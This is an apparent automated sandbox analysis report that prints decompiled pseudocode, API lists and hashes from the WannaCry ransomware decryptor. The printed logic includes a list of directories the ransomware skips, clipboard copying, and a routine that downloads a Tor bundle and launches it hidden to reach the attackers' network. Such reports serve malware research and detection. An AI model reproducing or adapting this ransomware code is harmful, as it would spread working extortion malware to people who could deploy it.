                                  0x0040879d
                                  0x004087a1
                                  0x0040883f
                                  0x0040884a
                                  0x0040884e
                                  0x004087a7
                                  0x004087ba
                                  0x004087cd
                                  0x004087d8
                                  0x004087dd
                                  0x00408804
                                  0x00408809
                                  0x0040881f
                                  0x00408823
                                  0x0040882b
                                  0x0040882c
                                  0x00408831
                                  0x00408831
                                  0x00408856
                                  0x0040885e
                                  0x00408862
                                  0x00408865
                                  0x00408867
                                  0x0040888c
                                  0x0040888d
                                  0x00408892
                                  0x00408869
                                  0x00408869
                                  0x0040886f
                                  0x0040886b
                                  0x0040886b
                                  0x0040886b
                                  0x0040887d
                                  0x0040887d
                                  0x0040889e
                                  0x0040889f
                                  0x004088a4
                                  0x004088ae
                                  0x00408a7d
                                  0x00408a85
                                  0x00408a8f
                                  0x00408ae5
                                  0x00408ae9
                                  0x00408a91
                                  0x00408a91
                                  0x00408ab9
                                  0x00408abe
                                  0x00408ac4
                                  0x00408ad8
                                  0x00408add
                                  0x00408ade
                                  0x00408ac6
                                  0x00408ac8
                                  0x00408acd
                                  0x00408ace
                                  0x00408ace
                                  0x00408ac4
                                  0x00408aed
                                  0x004088be
                                  0x004088c0
                                  0x004088c9
                                  0x004088d0
                                  0x004088dd
                                  0x004088e4
                                  0x004088e8
                                  0x004088ec
                                  0x004088f0
                                  0x004088f4
                                  0x004088f8
                                  0x004088ff
                                  0x0040891e
                                  0x00408901
                                  0x0040890b
                                  0x0040890b
                                  0x0040892d
                                  0x00408934
                                  0x00408935
                                  0x0040893b
                                  0x0040893d
                                  0x00408941
                                  0x00408945
                                  0x00408949
                                  0x0040894f
                                  0x00408951
                                  0x00408958
                                  0x0040895c
                                  0x0040897e
                                  0x00408980
                                  0x0040895e
                                  0x00408963
                                  0x00408967
                                  0x0040896d
                                  0x0040896f
                                  0x00408974
                                  0x00408976
                                  0x00408978
                                  0x00408978
                                  0x00408982
                                  0x00408988
                                  0x004089d3
                                  0x004089d7
                                  0x004089d9
                                  0x004089d9
                                  0x004089ec
                                  0x0040898a
                                  0x0040899e
                                  0x004089a5
                                  0x004089c2
                                  0x004089a7
                                  0x004089b0
                                  0x004089b0
                                  0x004089a5
                                  0x00408a05
                                  0x00408a0b
                                  0x00408a17
                                  0x00408a21
                                  0x00408a6b
                                  0x00408a6f
                                  0x00408a73
                                  0x00408a23
                                  0x00408a23
                                  0x00408a4b
                                  0x00408a54
                                  0x00408a59
                                  0x00408a5e
                                  0x00408a5e
                                  0x00408a21
                                  0x00408af5
                                  0x00408af9
                                  0x00408b02
                                  0x00408b09
                                  0x00408b15
                                  0x00408b20
                                  0x00408b2f
                                  0x00408b3c

                                  APIs
                                  • #470.MFC42 ref: 00408708
                                  • GetClientRect.USER32(?,?), ref: 0040871F
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
                                  • #6734.MFC42(?,?), ref: 00408746
                                  • #323.MFC42(?,?), ref: 0040874F
                                  • CreateCompatibleDC.GDI32(?), ref: 004087D2
                                  • #1640.MFC42(00000000), ref: 004087DD
                                    • Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
                                    • Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E
                                    • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D
                                  • #6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
                                  • FillRect.USER32(?,?,?), ref: 0040887D
                                  • #2754.MFC42(?,?), ref: 00408892
                                  • #2381.MFC42(?,?,?), ref: 0040889F
                                  • #3797.MFC42(?,?,?), ref: 004088C0
                                  • _ftol.MSVCRT ref: 00408951
                                  • _ftol.MSVCRT ref: 0040896F
                                  • FillRect.USER32(?,00000000,00000000), ref: 004089B0
                                  • #640.MFC42(?,?,?), ref: 00408B09
                                  • #755.MFC42(?,?,?), ref: 00408B20
                                    • Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3
                                    • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Rect$#5785CompatibleCreateFill_ftol$#1640#1641#2381#2754#323#3797#470#6194#640#6734#755BitmapClientMessageSend
                                  • String ID: \gA$fA$fA
                                  • API String ID: 1027735583-2217880857
                                  • Opcode ID: 5bddb1485544efbe4670e3f8524c11794e26297bb4920c3f9f94a116d6947829
                                  • Instruction ID: b72dd9534e9f1d52b621f8c4883ea919de29669ae4f9aefa89eb3b477b52946b
                                  • Opcode Fuzzy Hash: 5bddb1485544efbe4670e3f8524c11794e26297bb4920c3f9f94a116d6947829
                                  • Instruction Fuzzy Hash: 33D12CB16083419FC314DF25C984AAFBBE9BBC8304F508E2EF1D993291DB749949CB56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402AF0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 133COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _wcsicmp$_wcsnicmpwcsstr
                                  • String ID: This folder protects against ransomware. Modifying it will reduce protection$Content.IE5$N(@$Temporary Internet Files$\AppData\Local\Temp$\Intel$\Local Settings\Temp$\Program Files$\Program Files (x86)$\ProgramData$\WINDOWS
                                  • API String ID: 2817753184-2613825984
                                  • Opcode ID: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                  • Instruction ID: 690a6d88e0cbcba8c0a0bc490ea4abea364cf6131422823267360e98b5ddcfca
                                  • Opcode Fuzzy Hash: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                  • Instruction Fuzzy Hash: 3831843235162023D520691D7D4AFCB638C8FE5727F554033FD44E52C1E29EB96A82BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004035A0 Relevance: 36.2, APIs: 24, Instructions: 175windowclipboardmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E004035A0(intOrPtr __ecx) {
				int _t51;
				void* _t54;
				long _t55;
				signed int _t64;
				signed int _t68;
				void* _t71;
				int _t78;
				short _t86;
				signed int _t92;
				intOrPtr _t110;
				int _t121;
				void* _t122;
				void* _t123;
				void* _t126;
				void* _t128;
				intOrPtr _t129;
				void* _t130;
				void* _t132;
				void* _t134;

				_push(0xffffffff);
				_push(E0041365C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t129;
				_t130 = _t129 - 0x2e4;
				_t110 = __ecx;
				 *((intOrPtr*)(_t130 + 0x28)) = __ecx;
				_t51 = SendMessageA( *(__ecx + 0x80), 0x1004, 0, 0);
				if(_t51 != 0) {
					_t51 = OpenClipboard( *(_t110 + 0x20));
					if(_t51 != 0) {
						_t121 = 0;
						_t126 = 0;
						if(SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0) > 0) {
							do {
								_push(0);
								_t71 = _t130 + 0x18;
								_push(_t121);
								_push(_t71);
								L00412D7C();
								_push(0x4206e0);
								_push(_t71);
								_push(_t130 + 0x14);
								 *(_t130 + 0x308) = 0;
								L00412CCE();
								 *(_t130 + 0x2fc) = 2;
								L00412CC2();
								 *(_t130 + 0x2fc) = 0xffffffff;
								_t126 = _t126 +  *( *(_t130 + 0x10) - 8) * 2;
								L00412CC2();
								_t121 = _t121 + 1;
							} while (_t121 < SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0));
						}
						_t122 = GlobalAlloc(2, _t126 + 2);
						 *(_t130 + 0x14) = _t122;
						if(_t122 != 0) {
							_t54 = GlobalLock(_t122);
							 *(_t130 + 0x10) = _t54;
							if(_t54 != 0) {
								_t78 = 0;
								_t128 = 0;
								_t55 = SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0);
								if(_t55 > 0) {
									while(1) {
										_push(0);
										_push(_t78);
										_push(_t130 + 0x24);
										L00412D7C();
										_push(0x4206e0);
										_push(_t55);
										 *((intOrPtr*)(_t130 + 0x304)) = 3;
										_push(_t130 + 0x24);
										L00412CCE();
										 *(_t130 + 0x2fc) = 5;
										L00412CC2();
										_t86 =  *0x42179c; // 0x0
										 *(_t130 + 0x24) = _t86;
										memset(_t130 + 0x26, 0, 0xb3 << 2);
										_t132 = _t130 + 0xc;
										asm("stosw");
										MultiByteToWideChar(0, 0,  *(_t132 + 0x1c), 0xffffffff, _t130 + 0x24, 0x167);
										_t64 = wcslen(_t132 + 0x24);
										_t123 = _t132 + 0x28;
										_t92 = _t64 << 1 >> 2;
										memcpy(_t123 + _t92 + _t92, _t123, memcpy( *((intOrPtr*)(_t132 + 0x14)) + _t128, _t123, _t92 << 2) & 0x00000003);
										_t134 = _t132 + 0x18;
										_t68 = wcslen(_t134 + 0x28);
										_t130 = _t134 + 8;
										_t128 = _t128 + _t68 * 2;
										 *(_t130 + 0x2fc) = 0xffffffff;
										L00412CC2();
										_t78 = _t78 + 1;
										_t55 = SendMessageA( *( *((intOrPtr*)(_t130 + 0x18)) + 0x80), 0x1004, 0, 0);
										if(_t78 >= _t55) {
											break;
										}
										_t110 =  *((intOrPtr*)(_t130 + 0x18));
									}
									_t122 =  *(_t130 + 0x14);
								}
								 *((short*)( *(_t130 + 0x10) + _t128)) = 0;
								GlobalUnlock(_t122);
								EmptyClipboard();
								SetClipboardData(0xd, _t122);
							} else {
								GlobalFree(_t122);
							}
						}
						_t51 = CloseClipboard();
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t130 + 0x2f4));
				return _t51;
			}






















                                  0x004035a0
                                  0x004035a2
                                  0x004035ad
                                  0x004035ae
                                  0x004035b5
                                  0x004035c5
                                  0x004035d7
                                  0x004035db
                                  0x004035df
                                  0x004035e9
                                  0x004035f1
                                  0x004035fd
                                  0x00403607
                                  0x0040360d
                                  0x0040360f
                                  0x0040360f
                                  0x00403611
                                  0x00403615
                                  0x00403616
                                  0x0040361a
                                  0x0040361f
                                  0x00403628
                                  0x00403629
                                  0x0040362a
                                  0x00403635
                                  0x0040363e
                                  0x00403646
                                  0x00403653
                                  0x00403661
                                  0x00403665
                                  0x0040367a
                                  0x0040367d
                                  0x0040360f
                                  0x0040368d
                                  0x00403691
                                  0x00403695
                                  0x0040369c
                                  0x004036a4
                                  0x004036a8
                                  0x004036bc
                                  0x004036c6
                                  0x004036c8
                                  0x004036d0
                                  0x004036dc
                                  0x004036dc
                                  0x004036e2
                                  0x004036e3
                                  0x004036e7
                                  0x004036ec
                                  0x004036f1
                                  0x004036f6
                                  0x00403701
                                  0x00403702
                                  0x0040370b
                                  0x00403713
                                  0x00403718
                                  0x00403721
                                  0x00403733
                                  0x00403733
                                  0x00403735
                                  0x00403748
                                  0x00403753
                                  0x00403763
                                  0x0040376a
                                  0x00403774
                                  0x00403774
                                  0x0040377b
                                  0x00403781
                                  0x00403788
                                  0x0040378c
                                  0x00403797
                                  0x004037af
                                  0x004037b1
                                  0x004037b9
                                  0x00000000
                                  0x00000000
                                  0x004036d8
                                  0x004036d8
                                  0x004037bf
                                  0x004037bf
                                  0x004037c8
                                  0x004037ce
                                  0x004037d4
                                  0x004037dd
                                  0x004036aa
                                  0x004036ab
                                  0x004036ab
                                  0x004036a8
                                  0x004037e3
                                  0x004037e3
                                  0x004035f1
                                  0x004037f4
                                  0x00403801

                                  APIs
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
                                  • OpenClipboard.USER32(?), ref: 004035E9
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
                                  • #3301.MFC42(?,00000000,00000000), ref: 0040361A
                                  • #924.MFC42 ref: 00403635
                                  • #800.MFC42 ref: 00403646
                                  • #800.MFC42 ref: 00403665
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
                                  • GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
                                  • GlobalLock.KERNEL32(00000000), ref: 0040369C
                                  • GlobalFree.KERNEL32(00000000), ref: 004036AB
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
                                  • #3301.MFC42(?,00000000,00000000), ref: 004036E7
                                  • #924.MFC42(00000000), ref: 00403702
                                  • #800.MFC42(00000000), ref: 00403713
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
                                  • wcslen.MSVCRT ref: 00403753
                                  • wcslen.MSVCRT ref: 0040377B
                                  • #800.MFC42 ref: 00403797
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
                                  • GlobalUnlock.KERNEL32(00000000), ref: 004037CE
                                  • EmptyClipboard.USER32 ref: 004037D4
                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
                                  • CloseClipboard.USER32 ref: 004037E3
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#800ClipboardGlobal$#3301#924wcslen$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
                                  • String ID:
                                  • API String ID: 3405503685-0
                                  • Opcode ID: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                  • Instruction ID: c86228cefcec1f34603e32cf9825c4429cf2ad1f23db843e272d7cdac5f24a66
                                  • Opcode Fuzzy Hash: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                  • Instruction Fuzzy Hash: 0151E571204706ABD320DF64DC45FEBB7A8FB88754F10462DF249A72D0DB749909CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405E10 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 144COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E00405E10(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				void* _t86;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				intOrPtr _t132;

				_push(0xffffffff);
				_push(E00413C65);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t132;
				_v20 = __ecx;
				_v4 = 0;
				_t121 = __ecx + 0x890;
				_v16 = _t121;
				 *_t121 = 0x415c00;
				_v4 = 0x1d;
				L00412D52();
				 *_t121 = 0x415bec;
				_t122 = __ecx + 0x888;
				_v16 = _t122;
				 *_t122 = 0x415c00;
				_v4 = 0x1e;
				L00412D52();
				 *_t122 = 0x415bec;
				_t123 = __ecx + 0x880;
				_v16 = _t123;
				 *_t123 = 0x415c00;
				_v4 = 0x1f;
				L00412D52();
				 *_t123 = 0x415bec;
				_t124 = __ecx + 0x878;
				_v16 = _t124;
				 *_t124 = 0x415c00;
				_v4 = 0x20;
				L00412D52();
				 *_t124 = 0x415bec;
				_v4 = 0x18;
				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
				E00403F20(__ecx + 0x870);
				_v4 = 0x17;
				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
				E00403F20(__ecx + 0x868);
				_v4 = 0x16;
				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
				E00403F20(__ecx + 0x860);
				_v4 = 0x15;
				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
				E00403F20(__ecx + 0x858);
				_t125 = __ecx + 0x850;
				_v16 = _t125;
				 *_t125 = 0x415c00;
				_v4 = 0x21;
				L00412D52();
				 *_t125 = 0x415bec;
				_v4 = 0x13;
				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
				E00403F20(__ecx + 0x848);
				_v4 = 0x12;
				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
				E00403F20(__ecx + 0x840);
				_v4 = 0x11;
				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
				E00403F20(__ecx + 0x838);
				_t126 = __ecx + 0x830;
				_v16 = _t126;
				 *_t126 = 0x415c00;
				_v4 = 0x22;
				L00412D52();
				 *_t126 = 0x415bec;
				_v4 = 0xf;
				L00412CC2();
				_v4 = 0xe;
				L00412CC2();
				_v4 = 0xd;
				L00412CC2();
				_v4 = 0xc;
				L00412CC2();
				_v4 = 0xb;
				L00412EF6();
				_v4 = 0xa;
				E004050A0(__ecx + 0x444);
				_v4 = 9;
				E004050A0(__ecx + 0x3c8);
				_v4 = 8;
				E00404170(__ecx + 0x360);
				_v4 = 7;
				E00404170(__ecx + 0x2f8);
				_v4 = 6;
				E00404170(__ecx + 0x290);
				_v4 = 5;
				E00404170(__ecx + 0x228);
				_t127 = __ecx + 0x1a4;
				_v16 = _t127;
				 *_t127 = 0x4161a4;
				_v4 = 0x23;
				L00412F0E();
				_v4 = 4;
				L00412C9E();
				_v4 = 3;
				_t86 = E00405D90(__ecx + 0x120);
				_v4 = 2;
				L00412EF0();
				_v4 = 1;
				L00412EF0();
				_v4 = 0;
				L00412D4C();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t86;
			}
















                                  0x00405e10
                                  0x00405e12
                                  0x00405e1d
                                  0x00405e1e
                                  0x00405e2c
                                  0x00405e30
                                  0x00405e38
                                  0x00405e3e
                                  0x00405e42
                                  0x00405e4a
                                  0x00405e4f
                                  0x00405e54
                                  0x00405e5a
                                  0x00405e60
                                  0x00405e64
                                  0x00405e6c
                                  0x00405e71
                                  0x00405e76
                                  0x00405e7c
                                  0x00405e82
                                  0x00405e86
                                  0x00405e8e
                                  0x00405e93
                                  0x00405e98
                                  0x00405e9e
                                  0x00405ea4
                                  0x00405ea8
                                  0x00405eb0
                                  0x00405eb5
                                  0x00405ec0
                                  0x00405ec6
                                  0x00405ecb
                                  0x00405ed1
                                  0x00405edc
                                  0x00405ee1
                                  0x00405ee7
                                  0x00405ef2
                                  0x00405ef7
                                  0x00405efd
                                  0x00405f08
                                  0x00405f0d
                                  0x00405f13
                                  0x00405f18
                                  0x00405f1e
                                  0x00405f22
                                  0x00405f2a
                                  0x00405f2f
                                  0x00405f3a
                                  0x00405f40
                                  0x00405f45
                                  0x00405f4b
                                  0x00405f56
                                  0x00405f5b
                                  0x00405f61
                                  0x00405f6c
                                  0x00405f71
                                  0x00405f77
                                  0x00405f7c
                                  0x00405f82
                                  0x00405f86
                                  0x00405f8e
                                  0x00405f93
                                  0x00405f9e
                                  0x00405fa4
                                  0x00405fa9
                                  0x00405fb4
                                  0x00405fb9
                                  0x00405fc4
                                  0x00405fc9
                                  0x00405fd4
                                  0x00405fd9
                                  0x00405fe4
                                  0x00405fe9
                                  0x00405ff4
                                  0x00405ff9
                                  0x00406004
                                  0x00406009
                                  0x00406014
                                  0x00406019
                                  0x00406024
                                  0x00406029
                                  0x00406034
                                  0x00406039
                                  0x00406044
                                  0x00406049
                                  0x0040604e
                                  0x00406054
                                  0x00406058
                                  0x00406061
                                  0x00406066
                                  0x0040606d
                                  0x00406072
                                  0x0040607d
                                  0x00406082
                                  0x0040608d
                                  0x00406092
                                  0x0040609d
                                  0x004060a2
                                  0x004060aa
                                  0x004060af
                                  0x004060b6
                                  0x004060be
                                  0x004060c9
                                  0x004060d3

                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5
                                    • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
                                  • #781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9
                                    • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                    • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                    • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                    • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                  • #654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
                                  • #765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072
                                    • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                    • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                  • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
                                  • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
                                  • #616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
                                  • #641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#800$#609#654#765#795$#616#641#781
                                  • String ID: #
                                  • API String ID: 2377847243-1885708031
                                  • Opcode ID: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                  • Instruction ID: 200a364df958368678b01019567048f7f095356612ddb79f46c50176d87071e4
                                  • Opcode Fuzzy Hash: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                  • Instruction Fuzzy Hash: C4710A74008782CED305EF65C0453DAFFE4AFA5348F54484EE0DA57292DBB86299CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B840 Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 138synchronizationprocessfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0040B840() {
				void _v519;
				char _v520;
				void _v1039;
				char _v1040;
				struct _STARTUPINFOA _v1108;
				struct _PROCESS_INFORMATION _v1124;
				char _t29;
				void* _t46;
				char _t47;
				void* _t55;
				void* _t56;
				void* _t84;
				void* _t86;

				_t29 =  *0x421798; // 0x0
				_v1040 = _t29;
				memset( &_v1039, 0, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				sprintf( &_v1040, "%s\\%s\\%s", "TaskData", "Tor", "taskhsvc.exe");
				_t84 =  &_v1124 + 0x20;
				if(GetFileAttributesA( &_v1040) != 0xffffffff) {
					L8:
					_v1108.cb = 0x44;
					_v1124.hProcess = 0;
					memset( &(_v1108.lpReserved), 0, 0x10 << 2);
					_v1124.hThread = 0;
					_v1124.dwProcessId = 0;
					_v1124.dwThreadId = 0;
					_v1108.wShowWindow = 0;
					_v1108.dwFlags = 1;
					if(CreateProcessA(0,  &_v1040, 0, 0, 0, 0x8000000, 0, 0,  &_v1108,  &_v1124) != 0) {
						if(WaitForSingleObject(_v1124.hProcess, 0x1388) == 0x102) {
							WaitForSingleObject(_v1124.hProcess, 0x7530);
						}
						CloseHandle(_v1124);
						CloseHandle(_v1124.hThread);
						return 1;
					} else {
						return 0;
					}
				} else {
					_t46 = E0040B6A0("TaskData", "s.wnry", 0);
					_t86 = _t84 + 0xc;
					if(_t46 != 0) {
						L5:
						_t47 =  *0x421798; // 0x0
						_v520 = _t47;
						memset( &_v519, 0, 0x81 << 2);
						asm("stosw");
						asm("stosb");
						sprintf( &_v520, "%s\\%s\\%s", "TaskData", "Tor", "tor.exe");
						_t84 = _t86 + 0x20;
						if(GetFileAttributesA( &_v520) != 0xffffffff) {
							CopyFileA( &_v520,  &_v1040, 0);
							goto L8;
						} else {
							return 0;
						}
					} else {
						_push(0);
						_t55 = E0040B780( &_v1040, "TaskData", "https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip");
						_t86 = _t86 + 0xc;
						if(_t55 != 0) {
							goto L5;
						} else {
							_push(0);
							_t56 = E0040B780( &_v1040, "TaskData", 0x4221ac);
							_t86 = _t86 + 0xc;
							if(_t56 != 0) {
								goto L5;
							} else {
								return _t56;
							}
						}
					}
				}
			}
















                                  0x0040b846
                                  0x0040b84d
                                  0x0040b861
                                  0x0040b863
                                  0x0040b879
                                  0x0040b87a
                                  0x0040b885
                                  0x0040b892
                                  0x0040b95b
                                  0x0040b966
                                  0x0040b970
                                  0x0040b974
                                  0x0040b976
                                  0x0040b982
                                  0x0040b991
                                  0x0040b995
                                  0x0040b99f
                                  0x0040b9b2
                                  0x0040b9d6
                                  0x0040b9e2
                                  0x0040b9e2
                                  0x0040b9ef
                                  0x0040b9f6
                                  0x0040ba02
                                  0x0040b9b5
                                  0x0040b9be
                                  0x0040b9be
                                  0x0040b898
                                  0x0040b8a4
                                  0x0040b8a9
                                  0x0040b8ae
                                  0x0040b8e9
                                  0x0040b8e9
                                  0x0040b8f3
                                  0x0040b908
                                  0x0040b90a
                                  0x0040b923
                                  0x0040b924
                                  0x0040b929
                                  0x0040b939
                                  0x0040b955
                                  0x00000000
                                  0x0040b93c
                                  0x0040b945
                                  0x0040b945
                                  0x0040b8b0
                                  0x0040b8b0
                                  0x0040b8bc
                                  0x0040b8c1
                                  0x0040b8c6
                                  0x00000000
                                  0x0040b8c8
                                  0x0040b8c8
                                  0x0040b8d4
                                  0x0040b8d9
                                  0x0040b8de
                                  0x00000000
                                  0x0040b8e8
                                  0x0040b8e8
                                  0x0040b8e8
                                  0x0040b8de
                                  0x0040b8c6
                                  0x0040b8ae

                                  APIs
                                  • sprintf.MSVCRT ref: 0040B87A
                                  • GetFileAttributesA.KERNEL32(?,?,?,?,00000000,?), ref: 0040B88D
                                  • CreateProcessA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9AA
